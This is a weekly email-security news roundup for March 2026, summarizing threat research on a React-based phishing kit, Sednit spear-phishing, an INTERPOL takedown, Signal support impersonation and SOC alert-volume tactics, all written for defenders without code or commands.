Faisal MisleWhat's happening in email security: March 9-15, 2026
Attackers keep moving credential theft onto infrastructure defenders are reluctant to block. This week that meant a phishing kit built as a React app, hosted on Cloudflare Workers, and exfiltrating passwords through EmailJS.
At the same time, the market data is clear on the defender side too: post-delivery cleanup, analyst workload, and identity-layer controls are now where email security programs win or lose.
A React-Based Phishing Kit Turned EmailJS and Cloudflare Workers Into Credential Theft Infrastructure
This campaign is worth a close look because the attacker choices were built around how modern email defenses actually work.
The lure was a fake WeTransfer notification. The payload was not a static phishing page that scanners could parse easily. SANS found a React single-page application that assembled the credential theft flow dynamically in the browser. That matters because static HTML analysis has less to inspect when the page logic is bundled and rendered at runtime.
The exfiltration path was even more telling. Stolen credentials were sent through EmailJS, a legitimate email API service, instead of to attacker-controlled infrastructure. Geographic metadata was pulled through Geoapify, and the whole operation sat on a Cloudflare Workers domain. In practice, that means multiple layers of the campaign blend into normal SaaS and edge-service traffic that many security teams are hesitant to block outright.
This is the bigger trend to watch. Attackers are steadily replacing obviously malicious infrastructure with reputable services that already exist in enterprise traffic patterns. Reputation checks and coarse allowlists get weaker when the phishing stack lives on platforms users and defenders recognize. The hardcoded EmailJS identifiers found in the bundle show how little custom infrastructure an operator now needs to run a credible credential-harvesting campaign.
Sednit Is Back to Spear-Phishing as a Primary Access Route
ESET's latest Sednit research is a reminder that spear-phishing is still doing real work for advanced operators in 2026.
Since April 2024, the GRU-linked group has deployed a refreshed toolset including SlimAgent, BeardShell, and a modified Covenant framework, with cloud storage services used for command and control. But the initial access detail is the important part here. ESET says the campaigns against Ukrainian military personnel began with spear-phishing that exploited CVE-2026-21509.
The takeaway is straightforward. Sophisticated actors are not moving away from email. They are combining phishing with recent vulnerabilities and cloud-hosted post-compromise infrastructure, which makes the handoff from inbox to persistence faster and harder to disrupt.
INTERPOL's Latest Takedown Shows the Scale of Global Phishing Infrastructure
Operation Synergia Phase 3 took down 45,000 malicious IPs and servers across 72 countries. The standout number for email defenders was Macau's disruption of more than 33,000 phishing websites targeting banks, government entities, and payment services.
That count matters because it is a useful corrective to how teams often think about phishing campaigns. What lands in the inbox is only the visible edge of a much larger, industrial support system of domains, pages, redirects, and hosting nodes. Takedowns like this reduce attacker capacity, but they also show how much infrastructure can sit behind seemingly routine credential-harvesting emails.
Attackers Are Impersonating Signal Support to Hijack Accounts
Dutch intelligence says this campaign is large-scale and global, targeting officials, military personnel, civil servants, and journalists by posing as "Signal Security Support Chatbot." Attackers ask for verification codes and PINs or send malicious QR codes disguised as group invitations so victims link an attacker-controlled device to their account. There is no crypto break here. The impersonation is the attack. For email teams, the lesson is familiar: trusted-brand support language still converts because it creates urgency, legitimacy, and a reason to bypass normal skepticism.
Microsoft's Latest Benchmark Puts More Weight on Post-Delivery Cleanup
Microsoft's latest email security benchmark focuses on malicious messages that reached the inbox, not just what got blocked before delivery. In that model, Microsoft says Defender's Zero-Hour Auto Purge accounts for 70.8% of average post-delivery remediation, with integrated cloud email security partners contributing another 29.2%. The vendor politics matter less than the measurement choice. This is where many programs actually fail. A message that reaches the inbox is no longer a filtering problem alone. It becomes a speed-of-detection, remediation, and operational workflow problem.
Attack Volume Is Becoming a Deliberate Way to Blind Security Teams
One of the more useful arguments this week came from research on SOC workload exhaustion. If 66% of SOC teams cannot keep pace with alert volume, then high-volume phishing is not just noise. It is a tactic. Flood the queue with commodity email attacks, hide the better spear-phish in the middle, and the defender's review process becomes part of the attack surface. Email security teams should treat triage capacity and investigation speed as security controls, not as back-office efficiency metrics.
- How to Scale Phishing Detection in Your SOC: 3 Steps for CISOs
A practical blueprint for sandboxed phishing analysis, automated multi-step investigation, and SSL decryption to expose credential theft hidden in encrypted traffic.
- Researchers Tricked Perplexity's Comet AI Browser Into a Phishing Scam in Under Four Minutes
Guardio showed phishing pages can now be optimized against an AI browser's own reasoning and safety checks, a warning for AI-assisted email analysis products too.
- Your Signal Account Is Safe, Unless You Fall for This Trick
A follow-up look at the same Signal impersonation campaign with extra detail on fake support chats, QR-based device linking, and user-side mitigations.
- Initial Access Techniques Used by Iran-Based Threat Actors
Sophos highlights phishing, Exchange exploitation, Microsoft 365 password spraying, and remote management tool abuse as recurring entry points for Iran-linked groups.
- Meta Disables 150K Accounts Linked to Southeast Asia Scam Centers
Meta's crackdown shows how industrial scam operations keep scaling, with WhatsApp QR-code abuse and messaging-platform defenses that mirror email account-takeover patterns.